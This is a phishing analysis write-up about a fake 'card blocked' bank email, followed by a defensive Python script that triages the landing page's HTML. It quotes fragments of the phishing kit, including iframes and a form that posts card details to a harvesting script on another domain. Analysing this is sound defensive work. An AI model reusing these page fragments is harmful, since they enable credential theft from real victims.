Phishing: Urgent – Your bank card has been blocked
A user has reported a suspicious email to us:

Headers:
Received: from sds-16.hosteur.com (sds-16.hosteur.com [217.16.9.166])
Received: from www-data by sds-16.hosteur.com with local (Exim 4.69)
Subject: URGENT - Your bank card has been blocked
From: Banking Service <bankservice@service.fr>
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Sender: www-data <www-data@hosteur.com>

The Sender header and the second Received line show that the message was generated locally by the web server account (www-data) on a shared hosting machine, which does not match the claimed "Banking Service" sender. The clickable link “Access to your form” points to a suspicious URL:
hxxp://servicevbv.us.tf/

URLVoid report:
http://www.urlvoid.com/scan/servicevbv.us.tf
Report 2011-04-07 16:38:44 (GMT 1)
Website servicevbv.us.tf
Domain Hash 91fa19172a89f4c10b8dc0ca8b0460ec
IP Address 188.40.70.27
IP Hostname static.27.70.40.188.clients.your-server.de
IP Country DE (Germany)
AS Number 24940
AS Name HETZNER-AS Hetzner Online AG RZ
Detections 2 / 22 (9 %)
Status SUSPICIOUS
Looking at the page returned by that URL, we can see suspicious code:
<title>service verified by visa</title>
<link href="/zzz/css.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="/zzz/gas.js"></script>
<script language="JavaScript" src="/zzz/init.php?D=c2VydmljZXZidi51cy50Zg%3D%3D&L=" type="text/javascript"></script>
<iframe src="hxxp://www.adboost.com/index6.php" frameborder="0" width="486px" height="60px" ></iframe>
<iframe src="hxxp://krystalweb.co.uk/suuport/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/update.php" name="fid1" id="fid1" width="100%" height="100%" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<a href="servicevbv.us.tf">service verified by visa</a>
Why is it suspicious?
1) The page title ("service verified by visa") reads like a scam.
2) Why is the stylesheet located in the directory “/zzz/css.css”?
3) Why is the Google Analytics (?) script located in the directory “/zzz/gas.js”?
4) Why is there an iframe loading adboost.com/index6.php?
5) Why is there another iframe loading a long URL on krystalweb.co.uk?
6) Where is SSL? A page claiming to be a card verification service is served over plain HTTP.
The long URL:
hxxp://krystalweb.co.uk/suuport/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/update.php
loads the fake form where the user is asked to enter his details. The form then sends (POST) those details to a script hosted on yet another suspicious domain:
action="hxxp://shopkasa.com.br/cgi-bin/CobreBemECommerceDados/HiTman2.php" method=post>
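The checks above (foreign iframes, a form posting to a third domain, no SSL, an odd init.php parameter) can be done mechanically on saved HTML. The script below is an added example written for this write-up, not code from the original post or from any of the sites involved; it uses only the Python 3 standard library, and the two HTML samples are constructed from the fragments quoted above (with the repeated path segment shortened, the hxxp:// defanging kept so nothing is fetched, and placeholder input fields in the form). It lists every host the page makes the browser contact, flags those off the page's own host and any cleartext URL, and tries to decode base64-looking query parameters; the D parameter of init.php decodes to servicevbv.us.tf, i.e. the kit records the domain it is deployed on.

```python
"""Static triage of a phishing landing page: list every host the HTML makes the
browser talk to, flag those off the page's own host, flag cleartext transport,
and decode base64-looking query parameters such as init.php?D=...

Added example, not code from the original write-up. Python 3 standard library only.
"""
import base64
import binascii
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

# Constructed sample: the landing-page fragments quoted in the write-up, with the
# repeated path segment shortened and the hxxp:// defanging kept so nothing is live.
PAGE_HOST = "servicevbv.us.tf"
PAGE_HTML = """
<title>service verified by visa</title>
<link href="/zzz/css.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="/zzz/gas.js"></script>
<script language="JavaScript" src="/zzz/init.php?D=c2VydmljZXZidi51cy50Zg%3D%3D&L=" type="text/javascript"></script>
<iframe src="hxxp://www.adboost.com/index6.php" frameborder="0" width="486px" height="60px"></iframe>
<iframe src="hxxp://krystalweb.co.uk/suuport/5454SDF8541/update.php" name="fid1" id="fid1" width="100%" height="100%"></iframe>
<a href="servicevbv.us.tf">service verified by visa</a>
"""
# Constructed sample of the form tag inside the krystalweb.co.uk iframe (the input
# fields are placeholders, not taken from the real page).
FORM_HOST = "krystalweb.co.uk"
FORM_HTML = """
<form action="hxxp://shopkasa.com.br/cgi-bin/CobreBemECommerceDados/HiTman2.php" method=post>
<input name="field1"><input type="submit" value="Send">
</form>
"""

# tag -> attribute that makes the browser fetch from, or send data to, a URL
WATCHED = {"script": "src", "iframe": "src", "link": "href", "form": "action", "a": "href"}
SECURE_SCHEMES = ("https", "hxxps")


class ResourceExtractor(HTMLParser):
    """Collects (tag, url) pairs for the attributes listed in WATCHED."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        wanted = WATCHED.get(tag)
        if not wanted:
            return
        for name, value in attrs:
            if name == wanted and value:
                self.refs.append((tag, value))


def extract_refs(html):
    parser = ResourceExtractor()
    parser.feed(html)
    parser.close()
    return parser.refs


def decode_base64_params(url):
    """Query parameters whose value is valid base64 for printable ASCII text."""
    found = {}
    for key, values in parse_qs(urlparse(url).query).items():
        for value in values:
            try:
                text = base64.b64decode(value, validate=True).decode("ascii")
            except (binascii.Error, UnicodeDecodeError, ValueError):
                continue
            if text and text.isprintable():
                found[key] = text
    return found


def triage(html, page_host, page_scheme="hxxp"):
    """Return off-host references, cleartext URLs and decoded query parameters."""
    page_host = page_host.lower()
    findings = {"off_host": [], "cleartext": [], "encoded_params": {}}
    if page_scheme not in SECURE_SCHEMES:
        findings["cleartext"].append(f"{page_scheme}://{page_host}/")
    for tag, url in extract_refs(html):
        parsed = urlparse(url)
        # A scheme-less value ("/zzz/css.css", "servicevbv.us.tf") is resolved by
        # the browser relative to the page, so it stays on the page's own host.
        host = (parsed.hostname or page_host).lower()
        if host != page_host:
            findings["off_host"].append((tag, host, url))
        if parsed.scheme and parsed.scheme not in SECURE_SCHEMES:
            findings["cleartext"].append(url)
        findings["encoded_params"].update(decode_base64_params(url))
    return findings


if __name__ == "__main__":
    for label, html, host in (("landing page", PAGE_HTML, PAGE_HOST), ("form iframe", FORM_HTML, FORM_HOST)):
        result = triage(html, host)
        print(f"== {label} ({host}) ==")
        for tag, ref_host, url in result["off_host"]:
            print(f"  off-host <{tag}> -> {ref_host}: {url}")
        for url in result["cleartext"]:
            print(f"  cleartext: {url}")
        for key, text in result["encoded_params"].items():
            print(f"  base64 param {key} = {text!r}")
```

Run it on the saved HTML of each frame separately, passing the host that served that frame: the landing page reports www.adboost.com and krystalweb.co.uk as off-host, and the krystalweb.co.uk frame reports the form posting to shopkasa.com.br. The base64 check deliberately requires strict padding and printable output so ordinary parameter values are not misreported.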
URLVoid analysis:
http://www.urlvoid.com/scan/shopkasa.com.br